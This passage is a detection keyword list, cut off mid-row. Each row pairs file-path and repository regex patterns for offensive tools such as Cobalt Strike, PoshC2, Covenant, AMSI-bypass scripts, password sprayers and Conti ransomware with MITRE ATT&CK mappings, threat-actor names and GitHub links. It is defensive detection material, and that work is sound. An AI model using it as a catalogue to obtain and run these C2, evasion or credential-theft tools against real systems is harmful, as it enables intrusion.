"*/onionpipe:main*",".{0,1000}\/onionpipe\:main.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense 
Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*/open_vas.rb*",".{0,1000}\/open_vas\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/openbullet.git*",".{0,1000}\/openbullet\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","1","N/A","10","10","1426","688","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" "*/OpenBullet2.git*",".{0,1000}\/OpenBullet2\.git.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","1","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" 
"*/openflow-info.nse*",".{0,1000}\/openflow\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openlookup-info.nse*",".{0,1000}\/openlookup\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openvas-otp-brute.nse*",".{0,1000}\/openvas\-otp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/openwebnet-discovery.nse*",".{0,1000}\/openwebnet\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/opt/.exegol_aliases*",".{0,1000}\/opt\/\.exegol_aliases.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/opt/chimera*",".{0,1000}\/opt\/chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*/opt/cobaltstrike/*",".{0,1000}\/opt\/cobaltstrike\/.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*/opt/cobaltstrike/logs*",".{0,1000}\/opt\/cobaltstrike\/logs.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" 
"*/opt/cobaltstrike-nemesis*",".{0,1000}\/opt\/cobaltstrike\-nemesis.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/opt/Covenant/Covenant/*",".{0,1000}\/opt\/Covenant\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/opt/dnscrypt-proxy*",".{0,1000}\/opt\/dnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "*/opt/gocrack/files/engine*",".{0,1000}\/opt\/gocrack\/files\/engine.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/opt/gocrack/files/task*",".{0,1000}\/opt\/gocrack\/files\/task.{0,1000}","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1109","239","2024-03-13T21:35:11Z","2017-10-23T14:43:59Z" "*/opt/icebreaker*",".{0,1000}\/opt\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/opt/implant/*",".{0,1000}\/opt\/implant\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/lwp-scripts*",".{0,1000}\/opt\/lwp\-scripts.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability 
checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/opt/lwp-wordlists*",".{0,1000}\/opt\/lwp\-wordlists.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/opt/merlin/*",".{0,1000}\/opt\/merlin\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/opt/nessus/*",".{0,1000}\/opt\/nessus\/.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*/opt/Ninja/*",".{0,1000}\/opt\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
"*/opt/Password_Cracking/*",".{0,1000}\/opt\/Password_Cracking\/.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/opt/PoshC2*",".{0,1000}\/opt\/PoshC2.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/opt/Projects/AmsiBypass/*",".{0,1000}\/opt\/Projects\/AmsiBypass\/.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","N/A","10","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*/opt/rai/*",".{0,1000}\/opt\/rai\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/opt/seclists/Discovery/*",".{0,1000}\/opt\/seclists\/Discovery\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/optiv/Dent/*",".{0,1000}\/optiv\/Dent\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","1","N/A","10","10","294","50","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "*/optiv/Freeze/*",".{0,1000}\/optiv\/Freeze\/.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*/oracle-brute.nse*",".{0,1000}\/oracle\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-brute-stealth.nse*",".{0,1000}\/oracle\-brute\-stealth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-enum-users.nse*",".{0,1000}\/oracle\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-patator.py*",".{0,1000}\/oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-scanner.py*",".{0,1000}\/oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-sid-brute.nse*",".{0,1000}\/oracle\-sid\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/oracle-tnscmd.py*",".{0,1000}\/oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/oracle-tns-version.nse*",".{0,1000}\/oracle\-tns\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/orbitaldump.git*",".{0,1000}\/orbitaldump\.git.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*/oscp.profile*",".{0,1000}\/oscp\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*/OSEP-Code-Snippets.git*",".{0,1000}\/OSEP\-Code\-Snippets\.git.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/osmedeus*",".{0,1000}\/osmedeus.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/oSpray.py*",".{0,1000}\/oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential 
Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*/OUned.git*",".{0,1000}\/OUned\.git.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/ouned_smbserver.py*",".{0,1000}\/ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/out:revsocks.exe*",".{0,1000}\/out\:revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","0","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/out:spacerunner.exe*",".{0,1000}\/out\:spacerunner\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" 
"*/outfile:C:\ProgramData\hashes.txt*",".{0,1000}\/outfile\:C\:\\ProgramData\\hashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/outflank_bofs/*",".{0,1000}\/outflank_bofs\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/outflanknl/*",".{0,1000}\/outflanknl\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/Out-Minidump.ps1*",".{0,1000}\/Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
